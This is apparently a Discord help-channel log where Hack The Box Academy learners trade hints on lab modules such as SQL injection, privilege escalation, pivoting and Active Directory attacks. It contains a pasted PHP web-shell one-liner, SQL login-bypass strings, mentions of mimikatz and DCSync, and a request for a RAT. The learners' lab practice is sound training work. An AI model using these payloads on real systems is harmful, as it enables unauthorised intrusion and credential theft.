Maybe ill be of better help when I get there. I think its the module after the one Im currently on. But hopefully youll get past this by then.

warm turret
#

@west canopy i'm sorry but i do not agree with the statement of we do not need any programming knowledge to start. It is true that they give you many examples of the scripts needed but... Someone with no idea of what the script does like @craggy kernel probably will struggle a lot to complete even the sections of the academy on middle difficulty.

violet dew
#

Is it free to host a CTF event in hackthebox CTF platform?

west canopy
#

so its not actual programming

#

just knowing linux to use the scripts

#

or modifying a script. Script modification is not the same as knowing a programming language

warm turret
#

I would say a basic understanding of what the scripts are doing. I tell it because i have people asking me things like what does the scripts on the idoor sections. I mean it is the most basic, a loop and calling a curl on every cycle but even that they do not understand it

west canopy
#

depends on the module right

#

which I think i said , some modules absolutely require scripting knowledge

thorn urchin
#

Theres also a difference between not needing to know any to start, and never picking any up on the way.

#

You need to eventually learn some scripting at a minimum, its unavoidable

west canopy
#

not me, whenever I look at bash I faint

#

its a terrible condition

raven cairn
#

honestly don't think programming is that difficult compared to pentesting. Pentesting much harder

west canopy
#

Cry0l1t3's bash module took 5 years off my life

thorn urchin
#

you still did it though

warm turret
#

I think it should be a basic module like Tier 0 where you teach what is a variable, a loop, a function, a type. It could help a lot the beginners

thorn urchin
#

isnt there a module like that already?

west canopy
#

Have at it boys!

warm turret
#

50 cubes is reachable as F2P? I do not know the prizes really, i just paid πŸ™‚

west canopy
craggy kernel
west canopy
thorn urchin
warm turret
#

@craggy kernel absolutely, not exactly bash or py but the basics of any programming language

craggy kernel
#

Ohh ok that’s fine then

west canopy
#

Actually I don't know can you get 50 cubes from a free account?

raven cairn
#

yes

west canopy
#

There you go, Cry0l1t3 will torture you for free

warm turret
#

Cool then, i'll start redirecting people to that module then 🀣

raven cairn
#

Could I get some help on logging in with IMaps/pop3 on the Footprinting hard module?

#

I swear I found creds in || snmp || but its not working

vital adder
#

if you got ||tom|| cred openssl should work

raven cairn
#

Oh shiz I didn't inspect enough

#

lol

thorn urchin
#

Im also going to predict your next pain point and preemptively tell you to copy paste the thing inside sublime or vs code instead of what you were going to try first that wont work.

#

This will make sense when you get there

vital adder
verbal abyss
#

can i get a bruteforce working tool other then buirp

raven cairn
#

even if meant ironically

thorn urchin
#

itd certainly be an instaban on the server I moderate, dunno about here

verbal abyss
#

its a meme

raven cairn
#

Lol XDDDDD

verbal abyss
#

alr i changed it

#

u happy?

raven cairn
#

yesh

raven cairn
#

really depends

violet dew
#

Hey can anyone tell me....please..
That can I host CTFs in hackthebox CTF platform for free?

verbal abyss
raven cairn
#

OWASP ZAP is used as FOSS alternative to BUrp

#

Hydra

#

That is what I use

verbal abyss
#

cause iam working on a website and i wanna have an anti brute force attack in it

thorn urchin
#

Just do timeouts

#

like fail2ban

#

too many wrong attempts and just blacklist the IP

#

also enforce good security policies for password strengths so you or anyone else cant just use a shitty password

verbal abyss
#

deos it prevents it?like hydra or buirp

thorn urchin
#

yes

#

they get a couple of tries to guess the correct passwofd

verbal abyss
#

so why wont big websites use it?if that is the case

thorn urchin
#

They do

cosmic dock
#

Why does this keep throwing an error for a missing colon, when it is very clearly there

thorn urchin
#

Nobody bruteforces main login pages these days. If theyre going to its going to be on an obscure forgotten server that isnt setup properly, or its something like password spraying, where they take one or two really common passwords and try mass different users to try to gain access to at least one or two of em

#

fail2ban and the likes are the common driving force behind this

verbal abyss
thorn urchin
#

You cant have your cake and eat it too

#

you can configure things like fail2ban to be as restrictive or as generous as youd like

#

can also mix strategies

verbal abyss
# thorn urchin Yup

imma try to make user add uncommon symbols like @# etc.. in the policy and make at least 8 characters password long

thorn urchin
#

configure fail2ban to target high speed brute attacks, and then use account lockout policies that are more generous, say 10 given attempts within a certain time frame, and have accounts unlock after 24 hours or so. Basically just make it ridiculously slow to brute.

thorn urchin
#

just if you do the account lockout thing, youd want to whitelist admin accounts and maybe lock down that account with additional security measures so an attacker cant purposely lock out the admin accounts

woeful oxide
#

Hey guys

verbal abyss
#

but why Facebook accounts getting brutforced everyday

thorn urchin
#

They dont

#

they get password sprayed or credentials stolen from leaks/other means

woeful oxide
#

Someone who can help me out with packet inception, dissecting network traffic with wireshark

verbal abyss
thorn urchin
#
  1. login services havent always had so many good anti-bruteforce measures and 2. There are other services than just http/websites that can have login mechanisms to brute force.
sinful ocean
#

anyone have safe njrat?

thorn urchin
#

oh and 3. Smaller websites that dont think to use something like fail2ban or put in the effort youre putting in tend to be more vulnerable to easy attacks like brute forcing, so hydra still becomes relevant against those targets.

uneven hedge
#

IM DOING INFormation gathering now and i cant seem to get thel ast question to work i tried using the passive and active methods they taught us in the module but i could get it to work i also tried to use sublist3r but that didnt work either it would give me no answer

thorn urchin
#

itll give past scan results that will include the answer

lethal atlas
thorn urchin
#

Yeah sublist3r was the original intended route, but stuff changes

lethal atlas
#

thats twice they have been blocked.

thorn urchin
#

part of the fundemental risk of incorporating real world elements like that. Its nice to have a real world element but it means that the content can become broken in a moments notice

lethal atlas
#

I would think they would just set up a site specifically for that part of the module.

thorn urchin
#

Β―_(ツ)_/Β―

woeful oxide
#

Hey fellow hackers, working in windows fundamentals, got this error message any ideas?

proper inlet
#

Hello, can I ask for some help?
Stuck at privilege escalation : https://academy.hackthebox.com/module/77/section/844
my progress so far : got to user2, got the flag. Generated ssh key, can't put it to /root/.ssh/authorized_keys (access denied), and despite the fact I left password empty, it still asks for password when I try to ssh using it to either user2 or root at a remote. I'm clearly doing something wrong, but can't figure out what

#

getting it's indigenous /root/.ssh/id_rsa key also results in nothing since it asks for password for a key anyway (which I obviously do not know)

placid quest
#

@woeful oxide try rdesktop

woeful oxide
#

Got it

#

It worked

#

Thanks

thorn urchin
proper inlet
#

seems like I actually forgot last time to use chdmod 600 on extracted rsa key after all

#

now all works

thorn urchin
#

common mistake πŸ™‚

proper inlet
#

sweet jesus, I've been stuck for 3 days with it

#

anyway, thanks for assistance kek

thorn urchin
#

np

umbral pawn
#

hello, I'm having a problem unlocking modules in the Academy! I have enough cubes, but when I press the "unlock" button, nothing happens. The page just seems to move a little bit to the left. I've had the same problem in firefox and chrome on windows, out of a VM. Is this a known issue or am I doing something wrong?

timber hatch
#

any hints for sql injection skill assesment? i am stuck at the login pageπŸ˜‚

silver zenith
#

Im also doing it

#

Found something but still stuck

#

There is a vuln there

silver zenith
#

Nice think i ve got it

#

Or something

#

Dm me if you want a hint

vital adder
vital adder
silver zenith
#

Bye

wind egret
#

hmm, trying to ssh connect to a host for a module problem, but the connection keeps timing out

silver zenith
#

Ldamn dont listen too me haha

sturdy igloo
#

anyone can help with DNSAdmin section of windows privilege escalation?

wheat garden
#

anyone available who completed the password attacks module? How do you deal with the backup.vhd file? How do you get a local copy on your machine from smb? tried to access in both smbclient and a windows vbox using the GUI. All I can do is see the backup.vhd. Not sure what to do from here. Because of the size of the file cant use normal means of file transfer.

west canopy
wheat garden
solar zodiac
#

hey can anyone help me out with the last part of the common applications - skills assesment I?

west canopy
#

yes put it on the pwnbox and then if you need to transfer it off i like to use www.ufile.io

solar zodiac
#

having some problems fuzzing

west canopy
solar zodiac
west canopy
#

yep

west canopy
sturdy igloo
sly grotto
#

where is that :((

#

hey. i need help for this question
Enumerate the custom script that is running on the system and submit its output as the answer.
Footprinting
SNMP

placid quest
#

@sly grotto what is the problem

sly grotto
#

i mean.how can i do that

placid quest
#

Which module are u doing

sly grotto
placid quest
#

@sly grotto use a word list in seclists and use onesixtyone tool

sly grotto
placid quest
#

@sly grotto what file did u use

sly grotto
timid pollen
lament tartan
#

When a module says "updated" beside it, does it mean updated since you started/completed the module or does it just show "updated" to everyone?

timber hatch
#

sql injection, fundamentals - skill assesment...I can't find the writing files where i can place my injection...can anybody help?

umbral pawn
strong tide
lament tartan
strong tide
stiff stream
#

Few modules that has been updated, I had to do the updated portion to get the 100% again πŸ˜„

#

Just finished attacking enterprise networks, that was brutal

vital adder
rustic sage
#

because the vpn does not allow to hear the voices

silver zenith
#

Isnt academy a sortof school for good and evil? Hahaha

thorny glade
#

Hi, I am still confuse about HTB, so if I pay for premium subscription do I get access on everything and cert paths?

#

Sorry I am still confuse about HTB's UI there is so much going on I am confuse lol

arctic acorn
rough anvil
#

Hey, I'm doing the pivoting module and stuck on the skills assessment question 6, I have rdp to the ||172.16.5.35|| box (which has another interface with IP ||172.16.6.35||) and tried scanning from there the ||172.16.6.1-254|| space but found no hosts alive. Noticed that both interfaces in that box have configured as DNS a ||172.16.10.5|| but that address is not reachable, any hints as to where to go from here?

arctic acorn
arctic acorn
west canopy
#

wait nevermind... just read your question more carefully lol

#

yes its a Google question

#

i did not care for it

arctic acorn
#

Good to know. Might be worthwhile specifying that it has to be looked up, spent the better part of this afternoon on it. 😦

west canopy
rough anvil
arctic acorn
rough anvil
vital adder
rough anvil
#

feeling like there is something broken with that lab hahaha, can't find any more hosts

arctic acorn
rough anvil
#

I have reset the lab like 5 times now 😫

rough anvil
vital adder
#

did you change the network interface? if you click f9 or go in to the advanced menu or something you find the network interface

rough anvil
#

no I did not..

#

found it and another IP came up.. thank you!

#

damn ping scan

#

@arctic acorn @vital adder thanks guys 🀜 πŸ€›

silver zenith
#

Finally hehe just got the first flag of halloween ctf

#

Wrong channel

placid quest
#

@silver zenith congratulations 🎊 πŸ‘ πŸ’

silver zenith
#

Tnx

north ermine
#

Hi everyone ! I need help on one of the module
Attacking Common services
FTP

I found the USER J and R, i bruteforced J pwd and modified a file to allow me to ssh into the host as J.
But it seems that I need to do that with R, I tried to bruteforce both SMB and FTP with the normal list and a mutated version of it, but no luck.

Can I have a hint ?

vital adder
#

so did you use the wordlist ||found in the ftp server?||

north ermine
#

hmmm

#

not yet ! I'll keep diging

vital adder
#

hint it's way more easier than you think

north ermine
#

Can I pm you ? I don't want to spoil the others

vital adder
#

sure

rich mulch
#

Hi everyone,
This question is not related to HTB, it is related to THM room. I am extremely curious in the room Avenger Blog at Task 6 (SQLj) as follows
According to the material, it says the SQL query is SELECT * FROM username='[input1]' AND password='[input2]';
β†’ if I put ' OR 1=1; -- - in username, the SQL query should become SELECT * FROM username='' OR 1=1;

So my question is Why can I only bypass login when injecting both username and password is ' OR 1=1 -- ?

timber hatch
#

hello everybody
guys i really would like to come to an end with the sql injeciton fundamentals modul...
but i have no idea how to start in the skill assesment...can anybody help me...?

woeful oxide
#

If you need more hints dm me

latent ice
#

Um I am a beginner

#

I just started with the fundamentals and i am facing an issue in answering one of interactive questions

#

the question is about the most likely os flavour and i tried parrot and Parrot and Parrot1 and so on but it still tells me it is the wrong answer

timber hatch
#

Linux or Windows?

vital adder
rich mulch
strong tide
rich mulch
timber hatch
#

i was able to login...but i really have a problem to understand where and when i have to use the ' in the sql injection..
||admin' or '1'='1-- - did not work
admin’ or β€˜1’=’1’-- - did work... why?||

plush vapor
#

Hello! Recently this year, I've been wanting to get more into Cyber. So far I'm just going through HTB's academy and I'm still at the start of it, I see for the Setting Up module, Parrot is recommended for the Linux distribution used. At the moment my device is set up with Dual boot between Windows 11 I heavily regret updating that and Linux Mint which I'm still getting used to. Right now I'm wondering for the most part, what makes Parrot better than other distributions for cyber? Should I not spend time on installing all of the tools/packages on my Linux Mint system and be good?

vital adder
#

it is recommend to use something like parrot or kali in my opinion mostly because almost all of the tool and thing you will need is pre-install

rustic sage
#

hi guys, do you know what is the basis for the recommendation of boxes when you finish a module? I can't find the relationship between the Network enumeration with nmap module and the suggested boxes.

rapid sparrow
#

Anyone stuck in the Skills Assessment - WordPress?

#

I need to identify the version of wordpress site, but the site seems does not using wordpress

rustic sage
#

how to turn 2 characters into 1

#

two letters in one

vital adder
vital adder
foggy olive
#

@earnest flame sir !!!! please add this account !!!!! it is very le urgent before I leave

#

a very unfortunate incident happened

#

THANKS SIR CYA IN EEV

woeful oxide
rapid sparrow
#

Has anyone passed the bug bounty exam? Any review?

fleet laurel
#

Hi guys I’m new to hacking

#

I want to learn from scratch

#

Can you guys help me.

vital adder
fleet laurel
#

Thanks buddy

chilly igloo
#

stuck on this question "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain."

#

can anyone push me in the right direction with the following question for AD Skills Assessment II?

acoustic owl
hollow pewter
#

HELP

#

HELP ME

#

GUYS

#

I NEED HELP

thorn urchin
#

No one likes to help someone that spams all caps help repeatedly

#

in multiple channels no less

hollow pewter
#

But there is a virus in my computer

#

I need help

thorn urchin
#

yeah this isnt the server for that

#

were not tech support

hollow pewter
#

Maaan

thorn urchin
#

best of luck, try repair shops in your area πŸ‘

hollow pewter
#

Alr

#

alr

#

Thx

woeful oxide
#

I never thought Jesus would be a computer guy

thorn urchin
#

He isnt, thats why hes asking for help lmao

woeful oxide
#

πŸ˜‚πŸ˜‚

rustic sage
#

how to send a message every 2 minutes

woeful oxide
#

Why do you want to spam in first place?

sturdy igloo
#

Hi seeing if any ones done the Windows Privilege Escalation module may be able to give me some insight. Stuck on the section titled "Credential Hunting"

question "Search the file system for a file containing a password. Submit the password as your answer." Hint: :"Start at C:\Users"

Did indeed find a txt file at c:\Users\htb-student\Documents containing a password but when I enter it HTB is saying its incorrect. Am I missing something or is this an error in the module?

rustic sage
#

So for Linux Fundamentals. I have been stuck on this question for 2 days, and google has provided me with 87 ways to find an incorrect answer. Anyone available to help with what should be a simple problem?

vital adder
rustic sage
#

I just brute forced it before I went insane but. TLDR: How many Services are Listening on the Target System on all Interfaces. I ran basically every single netstat grep pipe yadda blah blah command I could think of. I found atleast 18 different answers but none of those were correct.

#

I dont understand why the answer was the answer as I never got it as an answer but. It was.

vital adder
#

oh yeah i remember this section was hell for me too but what is the same of this section?

rustic sage
#

I mean. Atleast I was on the right track and using the right commands. So. That makes me feel better

queen gazelle
#

Hey guys -- I am working through the AD Enumeration and Attacks course. I am doing the first AD Network after completing the course. I cannot seem to find tpetty's clear text password. I have tried mimikatz on ms01 as well as the web server. I have used powersploit to search in the description field. I have searched through sysvol. I understand I need to get the password to perform a dc-sync attack but man I am lost on where the heck it is?

vital adder
rustic sage
#

Yeah I did that, and didnt do it, limited to 4, limited it to 6, included all. did so many different things

#

I came up with 87, 106, 192, 10, 8. None of which were correct so I was mildly annoyed.

sturdy igloo
west canopy
queen gazelle
#

Will do! Here is the funny thing. I found a different path and just got the final flag but still don't have his clear text creds lol

#

I ended up using mimikatz to launch a powershell window with tpetty's ticket and performed a DC Sync that way on the admin account. If it works, it works!

west canopy
#

ah very nice

queen gazelle
#

I had his hash just not his password

west canopy
queen gazelle
#

Sounds great! I didn't know it was possible to perform a DC Sync attack with only the users hash. Definitely going to document how I did that in my notes!

west canopy
#

yea how did you dcsync from inside the powershell?

queen gazelle
#

I'll DM you my notes

peak rampart
#

i want to start my journey as a programmer

#

can

#

u advice me

#

or anyone

#

im just beggining

#

i exited as well as confused

tender dawn
#

where can I learn about crafting backdoors

latent ice
latent ice
#

ah turning off ad blocker worked!

#

Thank you very much @vital adder

tame ingot
#

anyone done the Markup box recently?

inner cave
#

Hi, is Anyone still working on Windows priv/ escalation further credential theft? I need a little hint on that section. question 1. I got a password from .xml file in dv folder but it seems that the password is hash?

inner cave
#

Got it... just use tools

rustic sage
#

how long to recreate linux

jagged zenith
#

Hello guys

rustic sage
#

Hello

#

Hey how to join a text only in one character

#

hello in just one letter

iron plaza
#

is it me or things changed around here ... like an upgrade

placid quest
#

Things changed in the upgrade

lime yew
#

Hi - i am on the Module "Getting Started" - Part: "Nibbles - Privilege Escalation".

I successfully started a shell by executing the .php script on the WebServer and got a TTY_Shell by using Python3 and pty (like its written in the Module...^^).

But when i try to use the sudo command to execute the modified monitor.sh file, i must enter a password for the user "nibbler", but the LinEnum.sh Skript said i wouldnt need the Password. In the Module Description they didnt need a password either.

Can someone give me a hint to my mistake?

#

Never Mind - seems like you have to give it the full path - and its not enough to be in the actual directory and just use sudo monitor.sh (seems like i have to read about this later...^^)

bronze frigate
#

Hi guys, need some help with PIVOTING, TUNNELING, AND PORT FORWARDING - Skill Assignment, have rdp into the first Win target and dumped the lsass. Stuck on send the file back to the pwnbox. Tried to forward the pwnbox 445 but no luck...

rapid sparrow
#

I need some help on that

#

I have already tried to attempt with Adjacent

woeful oxide
hollow pewter
sturdy igloo
#

which channel to get technical help?

sturdy igloo
#

an academy within an academy πŸ™‚

sleek patrol
#

Hi! I need some tips please. I have access to the user 2 directory where is located the flag.txt file, but i cant see the content.

"SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'."

foggy light
#

Im doing File Upload Skill assessment, I have bypassed the filter but i cant find the upload directory..

warm oriole
#

Is anyone able to help? I'm trying to do the XSS Phishing payload.

opal vapor
#

Does anyone know how I can connect me to the FileZilla-Server on the Windows File Transfer Methods. I have problem with the login. I tryed the username anonymous with no password, but I always get an login incorrect. I guess its the only way to use FileZilla, because there is no else opportunity to upload a file. So does anyone know the login credentials for the FTP-Server?

autumn garnet
#

can anyone help me with the password attack skills- Medium?

placid quest
#

@autumn garnet what is the problem

autumn garnet
#

i got on the user jason but i cant figure out how to get on to any other users

dire birch
#

anyone can help with attacking common applications sql?

#

im getting pissed at this module

sturdy igloo
#

Windows Privilege Escalation Skills 1, I’ve gained a shell as IIS but no matter what I’ve tried I can’t find the ldapadmin password or escalate credentials… any hint ?

placid quest
#

@autumn garnet did u look for any file or keys for ssh

autumn garnet
#

in jason i ran ls -al, no .ssh or .bash_history, but i seen in dennis theres .ssh and .bash_history but i have no idea how to get into dennis

timid pollen
#

hi guys i am struggling on this question of AD module, the users details provided havent got the privilege to run a full pass-pols in order to answer to this question:

What is the password history size of the domain? (How many passwords remembered.)

peak topaz
#

Is powershell the bash terminal?

rustic sage
#

Do someone have a hack apps?

vital adder
warm turret
#

Hack apps ?? πŸ€”πŸ˜‚πŸ˜‚

vital adder
vital adder
foggy light
#

Can i dm you ?

vital adder
vital adder
vital adder
vital adder
dire birch
#

with mssql database

vital adder
#

do you mean the Attacking Common Services module?

quasi wave
#

its not letting me scroll to the bottom of the windows screen to get at start button or task bar in the first Windows Fundamentals section

#

can someone help me with this?

#

if you need to DM me that's fine

autumn garnet
quasi wave
#

hi is anyone available to help me?

vital adder
vital adder
quasi wave
vital adder
#

wtf is that

quasi wave
#

if you look on the right there's no start button and I can't scroll down to get to start button

#

in the Windows VDP connection

vital adder
timid pollen
vital adder
dire birch
#

both for sure xd

#

i dont know what to do

vital adder
#

hint you can use the method show in ||Capture MSSQL Service Hash||

quasi wave
#

"maximize" is greyed out

dire birch
quasi wave
#

I used the tab key to get start button but I can't see what is currently selected so I kind of have to guess

#

lol

#

inconvenient

#

I got powershell open

timid pollen
quasi wave
#

I did

#

ok its really weird

vital adder
#

ohh i just realized do you have 2 browser tab on 2 side of your screen?

quasi wave
#

yes

timid pollen
#

thats why

vital adder
#

yeah then i think that is the issue

#

the pwnbox need a full tab to work

quasi wave
#

ok ya when I open it up full screen it fixes it

vital adder
#

or something like that

quasi wave
#

thanks

timid pollen
quasi wave
#

ok thanks

timid pollen
#

if you dont use the full tab/page you wont see it

quasi wave
#

anyways I gotta go to a workout. thanks for helping me with this

#

I will use actual full screen from now on

timid pollen
#

└──╼ [β˜…]$ python3 ldapsearch-ad.py -l 10.129.42.188 -d inlanefreight -u james.cross -p Academy_Student! -t pass-pols

Result of "pass-pols" command

Default password policy:

[+] |___Minimum password length = 7

[+] |___Password complexity = Disabled

[*] |___Lockout threshold = Disabled

[+] No fine grained password policy found (high privileges are required).

if anyone can help with active directory on password lenght question

autumn garnet
# vital adder hint check what is running on the target mahine

so i check with nmap and only found the smb services running for tcp and for udp i found 137 open but didnt find anything for the udp. i already got jason log in from the zip file in the smb shares and havent found any other users with any other files on smb. i check whats running on they system with "ps aux" and only found mysql is running but i dont know any databases in mysql.

vital adder
#

hint you are on the right path at ||the end there|| also a another hint for this part is ||try with what you got||

autumn garnet
dire birch
#

i tried impersonating, xp_subdirs etc.

#

and using responder is pointless

autumn garnet
#

ill change my background on my kali vm to it for a week

wind egret
#

I need a hint/nudge for this module question that I've been stuck on all weekend. I'm tasked with SSHing into a server using provided credentials, finding a way to swap users, and then grabbing the flag.txt. I can log in just find, but after that, I can't figure out how to proceed. The hint is to review what I've learned in this module, but a chunk of it isn't even applicable here. I tried doing a reverse shell, but the connection keeps timing out when I try to connect back. Sudo -l lists nopassword for user2 for /bin/bash as well

rustic sage
#

Try ctrl+ h

dire birch
#

i managed to do that, sorry for bothering

crisp merlin
#

Hey guys, need a clue into the right track on the last question of the SNMP Footprinting, "Enumerate the custom script that is running on the system and submit its output as the answer."

wind egret
vital adder
vital adder
wind egret
brittle bluff
#

Hi, anyone have any hints on how to find the flag with NSE? ran scans for a few hours now. Not sure what to look for.
Thanks

vital adder
#

i saw Jesus Christ in here Yesterday and now i saw TaylorSwift typing

vital adder
brittle bluff
vital adder
#

the module name not the module url number

#

also i just try url 7 don't point to any module

brittle bluff
wind egret
vital adder
#

yep you can run bash as root without any cred

wind egret
#

but I don't understand how that helps me or what I'm supposed to do with this information when it comes to swapping to user2. I checked out gtfobins for bash and nothing there seems like it would be useful, unless I'm missing something

thorn urchin
#

user2 may have access to stuff that can be useful that user1 does not

vital adder
wind egret
#

omfg

#

alright, ty both

#

I'm noticing a trend here that overthinking things is very easy to do lmao

vital adder
# brittle bluff Network Enumeration with Nmap

@brittle bluff so i just test some stuff and with the right script i still can't get the flag and the first time i do this i was too lazy to use nmap so i just enum by hand and get the flag

#

read the hint the flag is in ||the Web servers||

brittle bluff
vital adder
#

oh that's wired i try both on my machine and the pwnbox even with the right script i still can't get the flag

crisp merlin
wind egret
#

out of curiosity, is there a way to select text in a terminal to copy when you have to scroll to see it all? I managed to do it via zooming out, but am wondering if there's an easier way

vital adder
#

so can select the first or top or which ever part you need find and don't click anything else after you scroll down to the rest of the thing you need press shift and click on the end of the whole thing that you want to select

wind egret
#

alright, I'll keep that in mind. Thanks!

crisp merlin
warm turret
#

@vital adder https://academy.hackthebox.com/achievement/433014/153 thanks again for remind me that i need to sleep so maybe next time i'll remember all the hints i already had πŸ™‚

west canopy
worn forge
#

Hi, im stuck in footprinting medium lab can someone give me a hint? I found the sa user, I tried some logins in mssql and RDP, but idk whats next

worn forge
#

I tried with other default users but no

west canopy
worn forge
#

I tried to execute as admin but no im stuck 😦 i guess im missing something but idk what

quiet halo
#

can someone explain this please?

west canopy
steady anchor
#

Bro say this is a war way a tell you what happened to me if you dead olmost and you have a dream or a don't now am in bed in hospital and a dream 6 people sit aro a tesh with Kaps and black eyes they look to me and then they Comunidad together and a was awake what mean that because the doctors say am gonna to day this happened 2017 we are now 2022 bro]

vital adder
#

which module are you on?

woeful oxide
#

Hey guys

#

Working on the bash scripting module - conditionals

#

I don’t get how to do it, I mean, there’s a way to obtain the value without even using the if else statements

woeful oxide
worn forge
west canopy
#

sure

thorn urchin
#

So Im doing the Pivoting, Tunneling, and Port Forwarding module, on the RDP and SOCKS Tunneling with SocksOverRDP page.

I transfered over the SocksOverRDP server and .dll to the first host, but when I try to run regsvr32 on the .dll plugin, it just tells me the module failed to load, and then shortly after the dll is just deleted from the folder??

#

it registers it as a potential virus, even though AV is turned off

#

Got the flag by just manually rdping each box in order, but kinda defeats the intent of the page/lesson, but looks like the page is outdated and broken.

rapid sparrow
rapid sparrow
#

I stuck in Running SQLMap on an HTTP Request

orchid ingot
#

Module: Password attacks
Section: Credential Hunting in Linux

Please check the machine It's really slow.

brittle bluff
#

Hi, anyone have any hints on how to find the flag with NSE? ran scans for a few hours now. Not sure what to look for. module NETWORK ENUMERATION WITH NMAP page 7. i have tryed most of the scripts.
Thanks

placid quest
#

@brittle bluff use http-enum

brittle bluff
odd kayak
#

Hey I want to join a room to play CTF in HTB

#

Want to play CTFs but I don't know how to start

fading fractal
#

Man I paste echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php into my obsidian markdown file and windows defender deletes it because apparently its a threat

odd kayak
#

Ermm dude

#

I had logged in already

#

Now what should I do ??

sharp temple
#

Hello, does anybody know what is the correct answer in academy: Which version of Metasploit is free and can be used only through a CLI? because I tried everything and nothing works ... it should be framework or in long: Metasploit Framework

odd kayak
#

@sharp temple hey can U help me

timid pollen
#

i guess you need to read again the module

sharp temple
timid pollen
#

well if you cant find that answer meaning that you havet enumerated well the module as the answer is right there

languid dawn
odd kayak
#

Okay....

timid pollen
odd kayak
#

Btw now should I create My own team orelse join an existed teamπŸ™„

#

Can I join one of your teams😬

#

Bcoz I am new to here

languid dawn
#

it's a solo event, make your own team.

sharp temple
odd kayak
timid pollen
odd kayak
#

While I try to play it's asking to submit flag and press enter😐😐

placid quest
#

@sharp temple what ia the problem

flint agate
#

Yeah

sturdy igloo
flint agate
#

you mean after the ip or before the ip ?
I looked at the source code but i don't understand it

fossil sonnet
#

Hi guys !
I am working through the "Active Directory Enumeration & Attacks" course on Academy. I am stuck at this question:

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"

I've tried with Powersploit but the request still working for too many times without result so I am using Bloodhound but the two permissions I see are invalid answers. Someone who got the answer can tell me where I'm wrong please ?

sturdy igloo
flint agate
#

yes now I got it

#

I just didn't know the error is the answer .
I guess burnout can really f*** your judgement

sturdy igloo
rich mulch
#

Hi everyone,
Does anyone have a walkthrough of bWAPP bugs at security level medium and high?
Most tutorial series on the net only focus on "low" level, they don't guide "medium" and "high" level.

rustic sage
#

Hey can someone dm me I need some help at the IMAP/POP3 section in the footprinting module. I don't understand what should I do to find the flag and the admin email adress

placid quest
#

@rustic sage what is the problem

rustic sage
lament tartan
#

~~File upload attacks: Limited file uploads XXE payload (svg) not working for me.. Tried like the example in the module and also various other formats from payload lists / cheatsheets ~~seemed to work ok when i spawned new instance

queen gazelle
#

Hey all --
I am working through the second AD network at the end of the "AD Enumeration & Attacks" course and I must be missing something really obvious. I can't even find the the hash for the first domain user. Here's what I have done so far:

  • I used Kerbrute and jsmith.txt to generate a list of 57 valid users
  • Attempted AS-REPROASTING on these users with no success
  • Have been running Responder to see if there is any movement on the network but have not been able to get any users or hashes
  • Have attemped enum4linux on all of the servers -- including enumeration on the DC
  • Have tried to connect to every server's SMB share but get access denied

Does anyone know what I might be missing? Thanks!

loud dagger
#

what am i doing wrong? how is it not 2.4.29?

#

????????????

placid quest
#

@loud dagger write

loud dagger
#

write what

#

@placid quest

short brook
#

Heyyy

placid quest
#

@loud dagger don't copy and paste just write the answer

loud dagger
#

2.4.29

short brook
#

Can someone help me with 'Introduction to Networking'?

placid quest
#

@loud dagger logout and try again

loud dagger
placid quest
#

@loud dagger use whatweb to see what results u will get

past quarry
#

Hi everyone, I am in a module using Wb - Burp Intruder proxy servers. I'm trying to answer the question "use Burp Intruder to search for '.html' files in the /admin directory". I managed to find the directory "admin 200 OK". Can anyone explain what to do next? And how to find the flag?

loud dagger
#

i don't think the target i want is inlanefreight but i can't figure out what else i'm supposed to target

placid quest
#

Ok

solar granite
loud dagger
rugged stag
#

Someone can help me on the Footprinting - Medium Lab? I can connect the NFS share but I don't have permission to see the files. I guess I tried to create the ||nobody|| user that the folder seems to belong to, but I can't change to the user to access the folder. The lesson is too vague about that part that I could make any sense of it.
How can I get access to the NFS share?

solar granite
solar granite
#

That will give you an IP and port, where the web server for this exercise is located. You need to do this target spawning for every exercise

solar granite
#

Hi guys, I need some help with File Upload Attacks - Whitelist Filters. I managed to upload a file (||execshell.php/.jpg||), but I can't seem to find it, or execute commands. From the page source code I see something got uploaded ||img src='/profile_images/.jpg'||, and when I browse there I just see my shell's code, but I can't run commands.
I have tried various permutations of ||http://IP:PORT/execshell.php|| but got nothing.

woeful oxide
#

You crafted that shell or it’s a shell from a repo?

echo zenith
#

I'm in the password attack module, attacks on Protected Archives. I downloaded the Zip file on my machine, but when it comes to getting the password, John is not able to. Any ideas?

woeful oxide
solar granite
solar granite
woeful oxide
#

let me check my notes

placid quest
#

@echo zenith use the mutated list

placid quest
#

@echo zenith why

echo zenith
#

???

#

I don't know, I'll try, but it didn't occur to me, I imagined it would be with rockyou

placid quest
#

@echo zenith it is not rockyou use the mutated list which u had to make while brute forcing password

frigid monolith
#

having some issues with "ATTACKING WEB APPLICATIONS WITH FFUF - Skills Assessment - Web Fuzzing" maybe someone could help a brotha out

#

trying to fuzz extensions on 4 subdomains and can't get thru the whole thing in the amt of time it gives you on the box

#

found two obvious ones

#

I might be over thinking this....

fickle glen
#

Hey guys, in Active Directory Enumeration and Attacks, Skills Assessment I, I can't get the clear creds for the user.. I already know the user but to get the password , I tried mimikatz and lazagne and just can't (with elevated priv).. any hint is appreciated πŸ™‚